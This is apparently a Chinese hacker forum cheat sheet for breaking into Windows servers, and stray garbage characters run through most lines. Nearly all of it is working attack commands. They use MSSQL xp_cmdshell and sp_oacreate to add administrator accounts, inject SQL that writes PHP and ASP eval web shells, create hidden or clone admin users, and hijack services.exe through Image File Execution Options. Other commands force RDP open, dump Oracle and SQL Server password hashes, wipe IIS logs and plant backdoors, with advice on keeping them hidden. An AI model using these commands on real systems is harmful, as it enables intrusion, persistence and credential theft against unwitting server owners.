$ _9 O, S+ H' x7 q& z4 D
1.net user administrator /passwordreq:no/ T8 v+ H* n4 k0 t/ L
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了5 [+ L. v" S0 D$ _* r
2.比较巧妙的建克隆号的步骤: n! j9 k4 r" `. F
先建一个user的用户
8 |' U% y! D9 t) q8 T然后导出注册表。然后在计算机管理里删掉4 w* B+ T. T$ |) h0 [' m- F( a
在导入,在添加为管理员组/ C# K* n. v! I: h% l1 H
3.查radmin密码
$ T* F' }- {8 e/ d$ Ireg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
8 H8 ?3 B- `, B. K( P; [" u4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
: q1 [8 s1 x, |: X( }4 A建立一个"services.exe"的项$ f# L8 x# a4 p$ t2 I0 o
再在其下面建立(字符串值)7 q8 u4 R; k( K2 k7 F
键值为mu ma的全路径3 T7 I ]9 i& X( [6 R/ ?1 @/ ?
5.runas /user:guest cmd; I2 f0 w( S+ P
测试用户权限!
) c' E; H* n. x# V6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
5 u, g7 L: `9 B. V7 w7.入侵后漏洞修补、痕迹清理,后门置放:* A6 o2 t- `2 V) t( T
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门4 g: Z: |1 d6 U, R, z" `
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c; I! ]1 K& i0 g/ X
8 B! g# p5 z) u. y6 k3 `
for example
: s: k. v8 g7 E3 j5 L* Z/ ~6 b8 C+ a/ @# ^. X* H- d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
% ]; b, q p9 ]9 D0 D5 i" r; `( G5 k- Y" i5 M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'' F1 N, b7 q" b
- ^) n0 S' H# j9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
! r( u! B. \2 r6 J& f6 z" g! w如果要启用的话就必须把他加到高级用户模式
8 R' l/ R: _: L可以直接在注入点那里直接注入! a, s* ]: c$ g8 i( Y
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--: C0 w1 j- v- S$ {& T
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");-- ?' H. _, H) M* C' s, s( {1 a
或者; G3 T8 ~5 D8 x- d5 e
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll', j# T I! T, R' S. |
来恢复cmdshell。$ a/ R* G% Y/ _$ L& @5 U( w
. L0 _9 x# a8 J8 p; }) F
分析器
; _5 t0 y: \! N3 w7 h1 N! l: aEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
2 d6 H4 S% Y2 E8 Q% ^) H然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
+ q* ~1 z' N( d4 K10.xp_cmdshell新的恢复办法8 `# a5 P9 h9 E) X# d5 ^
xp_cmdshell新的恢复办法1 K9 H6 Y% s$ g( @9 r# {
扩展储存过程被删除以后可以有很简单的办法恢复:
" [; h% n1 f4 V删除4 x0 [6 g, y4 R" b/ ~4 J& _
drop procedure sp_addextendedproc
4 j# v. r4 u5 w4 ]drop procedure sp_oacreate
. [% S8 w+ |; `2 Y! q( ^; n3 rexec sp_dropextendedproc 'xp_cmdshell'' _/ b# |! T- P- X. a& u* }; P
9 [( z1 V% f" G( o
恢复
* \+ Y4 _2 v1 t1 n( qdbcc addextendedproc ("sp_oacreate","odsole70.dll")
( U' v8 E+ D5 ?/ Bdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
& @! R& D: R& }. i- h3 r9 w5 l( w% U7 {
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
- m# G* E7 `- q& [8 {. e8 Z" C& z8 k5 g
-----------------------------+ y( K- x$ G" Y* Q8 `. p
& K5 G+ ~" H/ H! ~4 s. w
删除扩展存储过过程xp_cmdshell的语句:
' z4 k1 d. H- P1 e5 J& Rexec sp_dropextendedproc 'xp_cmdshell'9 u" j& ^ @- l o6 K: l
; l- I- r3 k, s3 P3 E! G. \7 V
恢复cmdshell的sql语句
( ~& M" T/ T$ }% C1 C2 _8 b/ ?exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
% y: V1 u0 Q ^" |% M) w$ z9 G
5 j0 R! o1 |$ B# Y1 e% n8 ^- R0 k; ?' k( B$ V/ t1 u
开启cmdshell的sql语句" q1 s/ e) v4 T" ?( W# S& Z$ _3 `
- I' v2 U0 _& _' [- F
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll': e L( k5 H, w K' W) }
2 c" v% |5 s6 Q判断存储扩展是否存在5 T) F9 k; ^" }1 J( A( O( L4 C
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'+ L: Z6 h4 V; p7 _7 w) d
返回结果为1就ok
/ E' u; i5 C' [6 `0 r
3 V# ] i4 G; @$ ?恢复xp_cmdshell
/ q: y6 _6 L8 W* }$ }; Hexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'% J# z% K% A: v9 _2 }" A
返回结果为1就ok
2 }" D" }! I3 {, ], q# |* [7 g0 w
否则上传xplog7.0.dll/ @( ^ _- `& `
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'- J8 U+ }7 @7 o: F5 K
0 Y+ `3 D- k7 g, K3 h0 w7 l6 u- }
堵上cmdshell的sql语句
- d1 Y1 G5 x, asp_dropextendedproc "xp_cmdshel' @* H2 ]# U+ Y3 d- N$ C7 t
-------------------------6 n0 E. {( t1 C
清除3389的登录记录用一条系统自带的命令:
# D; R N* ^" S5 h- f* K* N' \reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
) p/ t5 B$ U4 _" h2 _+ l1 `' E
( w- X. ]; |5 `2 U) Z然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件8 x" h+ ~% h. ?& \: e
在 mysql里查看当前用户的权限
" Q+ C. i4 y4 \! b3 k4 Zshow grants for + I1 \' U! Q! {. h* I( s2 x& ?8 U- q+ ]
; ?3 R" l* S: f) ~- v; x; ^
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
5 j! H$ w8 n- i; O8 f
1 x* ]# D; ?; U0 i
: ^+ k3 g0 Z1 h7 ~Create USER 'itpro'@'%' IDENTIFIED BY '123';; }& o7 l2 i+ u+ z9 s" p2 ~; D: c
T8 ]# q+ g I# L$ t% I3 NGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION1 ]5 M1 t' i3 Y) X. y, d$ S
, K0 X; g! C: [MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
! ^$ a* s# j' f3 f# C# j5 F: L- r) w, u! }% Y W1 ~) t, r
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;! ~6 R- c$ d2 c* U
6 \: O. c. l- W- B" I" j u
搞完事记得删除脚印哟。3 n6 U; R( _9 g; F' r4 q
$ n6 _ e, d, S: xDrop USER 'itpro'@'%';
* P( S1 y' j: [) b o8 Q
: v7 f* @) P" L9 uDrop DATABASE IF EXISTS `itpro` ;0 X$ P# U2 B" H, ?( s3 ^9 f
K& W8 G1 h$ o4 N0 }当前用户获取system权限
, Y) U) t! S/ b% Y8 {: Esc Create SuperCMD binPath= "cmd /K start" type= own type= interact
1 f1 _1 k: ]6 E! \# Msc start SuperCMD7 P; o% x/ s& u' l& ]
程序代码: |. Y$ z+ U+ V; x
<SCRIPT LANGUAGE="VBScript">
5 b( t! A) H8 v% y) @set wsnetwork=CreateObject("WSCRIPT.NETWORK")# M+ Y( K5 {& a0 O# A3 Y( r. M
os="WinNT://"&wsnetwork.ComputerName
: N% e2 f% E0 } M1 Z/ OSet ob=GetObject(os)
& Y) ^2 Q* C7 B0 m2 f( ASet oe=GetObject(os&"/Administrators,group")
1 H! [! d- [% Q( g# _3 H1 o% {( p/ sSet od=ob.Create("user","nosec") h8 I- D6 [% b+ P3 G4 y0 b8 D
od.SetPassword "123456abc!@#"5 q: M" U! Z4 b- g; ~, T* k. J
od.SetInfo% P7 o+ x- J% k4 d2 n
Set of=GetObject(os&"/nosec",user)
7 Z& _0 ]* F# w. j5 Q% ^oe.add os&"/nosec"* R; ?3 K3 e5 E
</Script>
6 u* j) u7 v) I# |$ p0 H: L x9 @<script language=javascript>window.close();</script>) a$ @; b; i! l/ h
, s2 f- e7 A A
% d8 e1 X7 S5 J5 ~2 z3 d# o" e2 x
0 p. D# T# r( Y+ O# {& n( L, F( b! S% O. x
突破验证码限制入后台拿shell
" I8 ]/ J2 O" [# f+ f9 f程序代码* q1 ?, n: Y, q6 Y
REGEDIT4
9 J7 {7 V% A3 E7 I[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 5 e8 l3 }9 [2 [4 n o
"BlockXBM"=dword:00000000
3 ?* w2 L/ z2 `0 R; b$ |
6 \0 J, C& P# T! v% A保存为code.reg,导入注册表,重器IE
8 N3 W6 N7 S; C' W7 D3 s- J( i+ S就可以了
0 ~9 Q3 L7 `8 t% h) junion写马
9 o7 A' h0 @7 {# p程序代码& I w8 h; {6 q7 p1 J
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
6 u% y6 S$ U% a* G" m3 s
+ R) _. b2 B, g5 j# O6 X$ U应用在dedecms注射漏洞上,无后台写马! J( B1 j% G. f0 k) R
dedecms后台,无文件管理器,没有outfile权限的时候9 y! j6 O2 H& U' n6 }8 N3 L9 Z7 H9 ~
在插件管理-病毒扫描里- D2 W& T5 `$ K7 t+ T8 W
写一句话进include/config_hand.php里
5 m8 O: T* \' m程序代码2 ]' x2 S6 s u) t& H
>';?><?php @eval($_POST[cmd]);?>
o) F$ j* b1 Z. o& L3 r3 k9 e( @& g1 V, o$ L( s
, w, R/ d9 m' M1 M- ~8 g& k如上格式
+ ^$ R- Q( p4 m+ D) q9 A2 z3 c+ c, h
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
: Y7 _9 Y9 V& W8 y: ?( Q程序代码
' M% u- a& U; [1 F4 Nselect username,password from dba_users;9 R2 r/ m2 L) g1 \
7 D/ x) ?! H+ I5 z/ Y* _ u
; A0 x. D) M( a" r, F9 [0 hmysql远程连接用户
5 A4 B/ F* f; D" j& F" k程序代码/ {+ u; q6 c7 d6 K" r
0 b* \) B9 z/ Y5 k' K
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';4 p: R4 |- f, ?: s
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
0 D/ H$ i ?) e! sMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 02 \# A+ O4 B" I7 e
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
4 T( E8 M9 S. ]" r6 t0 N/ a7 L6 m& L# n1 w
5 E7 X( [" m* H- F( F$ b
7 a& S, m1 t8 i4 [$ _& j
# S0 \) v4 _! B. z% `& T4 e
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00 R$ D7 k Z* X% U
/ m2 }5 Z7 Y$ |. p4 M1 a; G1.查询终端端口0 r! \+ s, V0 _- i2 s1 s1 d( P" y. [
! X4 g% y+ {+ F/ b2 n
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
; R1 P/ z9 {. e# s: n
! e" F& K6 O8 f' H' K3 k# N% @通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
8 Q0 W: O9 s; a1 s" z @- `type tsp.reg
/ ~) p: @, V9 f* D$ g' ?
5 D5 i: K7 W; g0 ^% |) _7 b2.开启XP&2003终端服务, r X. a2 v$ Z
- l6 J! v# `; ?# l
* m/ ^5 V4 U7 T! K8 pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
k" Z' ]& O) |) C8 T) H- K* s, l7 `/ h' a7 z0 `; c
5 ?5 {, E% z6 I1 e7 J+ f2 MREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# e) ?+ }! q, Z0 G
: d$ f4 ]/ v! L3.更改终端端口为20008(0x4E28)
4 z+ o: A2 u1 X* @4 N7 ^9 y' _: m% N F( X. M7 w3 q% z: V
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f2 r0 X3 a' R2 e4 Z
9 s) _% Y/ `6 I5 D* F5 p, e% h
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; N5 {) U$ P9 Q: o$ @' O
& k0 T! Y2 ^! t3 G) T- P9 H6 M4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
1 |- b: a; C) q1 ~" o2 F( C! D
i/ R; N' I! b G1 ~0 }" zREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
* Y6 \4 o- P2 B( V9 n! I+ {; [
h; \( m' I! \; F
6 `. m+ ?' ^# [% A5.开启Win2000的终端,端口为3389(需重启)
, b( t5 s5 i$ {6 }' J* A( n
! k/ ]# c$ t0 }" Y U6 z6 ]/ @% Kecho Windows Registry Editor Version 5.00 >2000.reg ; p$ p& A/ A8 c8 ]; K9 E. ]. n- y$ z
echo. >>2000.reg. \! D( l+ k4 ]: l* \
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 9 Q" S% A) O& }) H: B7 G- F
echo "Enabled"="0" >>2000.reg : X4 X0 z* h ]; C! x( U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
! d9 |9 D+ w, C) X! Z# uecho "ShutdownWithoutLogon"="0" >>2000.reg
4 L. ~+ L% @& X6 xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
0 }/ R- T( W5 C# k" U) Lecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
! Z$ [" B3 U6 u+ d; q( w; F% wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg * p% N- _( k9 X8 U4 S- r8 U1 w7 v
echo "TSEnabled"=dword:00000001 >>2000.reg
0 O; `" t. l. o; b4 Z) uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg , \; E# d- o0 g& r7 s! B+ Q) T
echo "Start"=dword:00000002 >>2000.reg ) {; Y6 U# Q# M' f# S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
8 l; e- e' {2 h+ q% V1 h2 lecho "Start"=dword:00000002 >>2000.reg 6 g& g6 V% C4 J8 J, f# A
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ( P ?4 I+ S6 J# m) t9 U; W& Y
echo "Hotkey"="1" >>2000.reg
, P6 j) P4 _8 S3 N( R6 p: ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
! K5 y" Z+ V- ^2 i3 |echo "ortNumber"=dword:00000D3D >>2000.reg
' p$ p6 e3 S5 a" W) F! z# G' |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ) J" y) i9 P( `5 f0 [3 V
echo "ortNumber"=dword:00000D3D >>2000.reg
! r+ Q4 ]4 S* o1 U1 c% q9 i/ K \2 c7 U2 G; S
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)! u# B& \- n+ d: Y
) X$ i; t0 M, ~4 W% @
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
; @6 z7 B4 W! m8 R9 D. f(set inf=InstallHinfSection DefaultInstall)/ X" @; E2 O( P; a
echo signature=$chicago$ >> restart.inf. Z( n$ v5 s6 v4 r" L
echo [defaultinstall] >> restart.inf
6 z! c) i1 @% l% ?! z. B/ |! U/ Irundll32 setupapi,%inf% 1 %temp%\restart.inf
* X. v! Z+ l$ F6 J9 L8 j. k( J& J) T% ^0 h' P, `0 G* R, c4 Y- X. c
5 g" B9 r* r- s p- F' q: d1 c7.禁用TCP/IP端口筛选 (需重启)( h. y; f- e# T/ \, K
4 e- l% ]/ E! `* e+ x+ t! F
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
: _: P+ b# H C4 R% [/ B k: f) w' B y8 {& K9 E. u x
8.终端超出最大连接数时可用下面的命令来连接
( {' {1 x+ Y2 ^
/ c8 T' Q2 M% Ymstsc /v:ip:3389 /console- Z/ \: B' n4 k. Y
! W* v0 t! `2 K9.调整NTFS分区权限
0 f( j) M; L' t7 b6 Y' q" V
z' ]# X& r+ _) Z: q1 Z* }cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)- j$ C$ i% @& }+ z
9 D$ Z. g& y4 }3 i- v8 N' ocacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
2 Q2 R s# `/ o% `' h* A8 B. W, k
------------------------------------------------------7 u; d* {2 v- ^ a5 W$ F
3389.vbs ' u5 E8 Q3 b+ m4 S0 [1 N1 q. Y# D
On Error Resume Next: P# u8 h$ m/ r& I5 k/ B
const HKEY_LOCAL_MACHINE = &H80000002 f& ?2 S& ~" a
strComputer = "."6 b6 C) L) A! M
Set StdOut = WScript.StdOut
1 V% A* U" W v/ o3 `2 ~- JSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
3 m# Y, W Q# H2 W1 CstrComputer & "\root\default:StdRegProv")/ m0 g2 E6 v! `
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
2 L) H2 E; C0 w* d# ~6 Woreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath, B/ l, F+ p, b5 N- L1 Z: X
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
t( k& V# U( N; j/ p5 j, M' G5 r, Soreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath! Y1 C1 y# r4 M- J, e" m, J$ a
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"6 C9 w5 M: r& }1 b+ I
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 Q# T S e3 Q$ y J
strValueName = "fDenyTSConnections"7 O% [4 m" d* ?- f0 A
dwValue = 0) a# b2 D- @! C6 _
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue# N% L9 I4 s8 a( Q( G( J) C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
8 S; E6 F( d; w1 B G, m3 z1 b# UstrValueName = "ortNumber"4 _/ j* f( [6 B( f# {8 Y+ G
dwValue = 3389" S+ o0 X( W4 B8 M% S
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue: A% J2 d) f0 Q+ [
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"# W$ a' X3 m+ a' U) s
strValueName = "ortNumber"
, u2 K. Z+ p. g, M" z5 ^& edwValue = 3389/ f1 P- O7 z* S; W
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
4 q% Y, ~2 ^2 s' ^Set R = CreateObject("WScript.Shell") 5 a/ D5 U. y0 r9 ~2 c, g6 S# A
R.run("Shutdown.exe -f -r -t 0")
! K" [4 \5 {) ^: {) X
$ `! l' k! [9 r& `" A% F删除awgina.dll的注册表键值2 Z- F1 S3 M0 Z, R! ]* m! T
程序代码# i' ~) i: k4 U
' w; s3 F$ p# t; ]3 t
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f1 B5 Q2 I' t& b
' ?9 f3 J/ o' t* b
% v; L8 r5 a& J9 R, f% d, ~+ `
R) V' N6 J, ~- F: h0 z3 Y3 a2 x$ g! @* M
程序代码
/ l: o' ?8 m4 A& I! ]1 Y8 b; CHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash, F1 V" g: T- f9 N! ?
& R+ ~1 x) ^3 G+ ?/ J' |设置为1,关闭LM Hash
1 H6 K% E4 g. q0 z, Q/ w
/ l1 @; Y! v ?9 X+ ?# v; j1 e6 `数据库安全:入侵Oracle数据库常用操作命令
/ x1 E0 x P& U/ F2 S' Q8 B1 Q最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。1 z) `" L* F% W# u# B2 Y: Y
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
6 o' ?1 c8 u- h9 \2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;6 z4 C& N5 |8 }
3、SQL>connect / as sysdba ;(as sysoper)或# r* K5 {! p X- k3 I x! q2 w3 w' L
connect internal/oracle AS SYSDBA ;(scott/tiger)
! S" L* v* }5 U# Q& E& I4 Gconn sys/change_on_install as sysdba;
( n( A, i4 E+ p: {1 g4、SQL>startup; 启动数据库实例
2 `& O2 ?# u, s. s1 n( m- G5、查看当前的所有数据库: select * from v$database;# v1 U% n+ j) U4 D: ~+ v1 D
select name from v$database;
$ s/ D/ q5 L. a' I- k6、desc v$databases; 查看数据库结构字段4 b l7 k/ n! R* S: j1 [5 ~
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
- I- `: U/ _( D/ ~& Z2 RSQL>select * from V_$PWFILE_USERS;8 d- L2 F2 y0 @) o; A% k7 |
Show user;查看当前数据库连接用户* G( @6 R% `" g! h
8、进入test数据库:database test;; ^5 a, O j2 }4 D; j
9、查看所有的数据库实例:select * from v$instance;
# J3 c0 ?0 t; F0 R( L7 }如:ora9i
; s' f* m! s% \: G" g4 E* ~10、查看当前库的所有数据表:
& \; L' k5 n- W' W7 ^! w, o4 f7 gSQL> select TABLE_NAME from all_tables;" X: O2 ?. y: S: V
select * from all_tables;
4 Q8 y5 X5 l* V! mSQL> select table_name from all_tables where table_name like '%u%';) \! {3 ]4 g8 B+ H3 i0 |; F2 |
TABLE_NAME9 E9 K2 r2 ?9 Y/ P# A9 I, q. _
------------------------------
* m5 o* U1 j1 W) W1 Q. o1 y_default_auditing_options_
3 k; t- h: b3 Z" b& q11、查看表结构:desc all_tables;
7 g2 ^( l8 z R12、显示CQI.T_BBS_XUSER的所有字段结构:; ^) [( I4 e8 ^9 k
desc CQI.T_BBS_XUSER;3 M) ~- X& h( G) L0 q% i% u
13、获得CQI.T_BBS_XUSER表中的记录:
" w! V$ T+ r8 I8 x+ gselect * from CQI.T_BBS_XUSER;
8 W m1 }* R5 g14、增加数据库用户:(test11/test)5 ^5 h8 ~; `7 l3 }- a$ U
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
) W7 `7 ^ ^% \5 V; C: V! N7 K3 A15、用户授权:
& E( H' T/ v. b4 S2 Ugrant connect,resource,dba to test11;. Q" p' {/ P$ K$ [1 B, T
grant sysdba to test11;) I O& L6 S3 Y/ b2 E8 y
commit;! q, O% Y2 X8 m/ L O& W9 Q$ B
16、更改数据库用户的密码:(将sys与system的密码改为test.) C l3 R5 D$ L: V
alter user sys indentified by test;; R6 g& u. {$ d4 x% @
alter user system indentified by test;
7 H3 f+ {% e; u- U+ q4 w. L G' I) @8 j9 w* |3 U
applicationContext-util.xml
& h3 w l; S/ y( kapplicationContext.xml3 s ?% ]7 b. x# T& \0 d
struts-config.xml; x+ d' r ?4 w5 N& Q5 B s" u
web.xml
- j: H9 m. n- S, g4 h5 ~server.xml$ ~8 ?) e; g& _# y5 a/ z) A7 A: d
tomcat-users.xml
, E3 H+ r) G$ i2 zhibernate.cfg.xml
! v4 _" Q( q& P& d* c' [. F+ Qdatabase_pool_config.xml2 T2 A' L c" t+ l1 Y% S
5 o# [2 d9 Q% w
$ L" B# \/ U( D3 j* M" M3 z\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
' V/ F* o. W8 [- R\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
8 C& m. ]7 \8 [! O, D\WEB-INF\struts-config.xml 文件目录结构
) p# w3 J! y- S) i- _- ?3 I
, ^; `( B6 e2 B4 y- G2 g6 B! rspring.properties 里边包含hibernate.cfg.xml的名称& G* P2 n' Z; {0 a4 [
0 {, z- w( ^% J3 S8 W: D
9 F- d" p! g! S/ {
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml3 P# \) n, l% L, ?; h- Z
! Q. b: B: o8 x' Y4 N8 D/ X- |
如果都找不到 那就看看class文件吧。。
' \2 w* w5 E8 Q% F0 A+ D! R' Q. E( o* n; @3 x' u x
测试1:2 Q9 v6 f; P; z% q6 A2 N) |
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t19 f4 ^+ n8 b4 T; j7 i0 ^) P! d
/ l4 Q! X" U2 d. I) \# I. V0 e2 L
测试2:3 H) D# W& ] g6 R
# F" a% J4 D: h5 f* kcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
6 r+ a) y4 Z2 K& V! F, h+ B/ q d- C" }: ^$ a
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
* z* l9 i* K9 W0 R4 M9 o: M: B! m/ H+ B" r t
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
! A% }+ w7 [% b9 T* C9 G) {7 D! C, _" C: q; |* C0 {& c; ^- x
查看虚拟机中的共享文件:
# V( K6 V( C1 h; H4 r$ V0 P) C在虚拟机中的cmd中执行
8 C3 s' S- X: Y& k* ~\\.host\Shared Folders
5 ~" F) W+ f4 p& l4 V* }3 ~1 A$ ~
j9 _! U. H5 N+ [2 V9 Lcmdshell下找终端的技巧' r: g# L0 ~; q3 V
找终端: 7 W% _- |& G5 l. q
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
: C; W! c1 ~9 Q9 e; l 而终端所对应的服务名为:TermService
( o, ]3 e* j. f( F) I0 w第二步:用netstat -ano命令,列出所有端口对应的PID值!
) l3 O& ]- o8 [: P+ @1 W3 p; X: h3 h 找到PID值所对应的端口
7 w; k1 l* ]& j7 o$ `& D, G* ~0 S, y1 t Y4 L
查询sql server 2005中的密码hash% q) t, F! o5 G9 V0 h$ ]
SELECT password_hash FROM sys.sql_logins where name='sa'
4 o+ f. e2 X; c; @, R8 \SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
l9 H) m1 j4 q" ^access中导出shell
" Y) {7 y* f3 o9 X A/ y7 Y$ d P( l U& X1 k8 Q
中文版本操作系统中针对mysql添加用户完整代码:$ W- v+ o2 v Y/ y* D
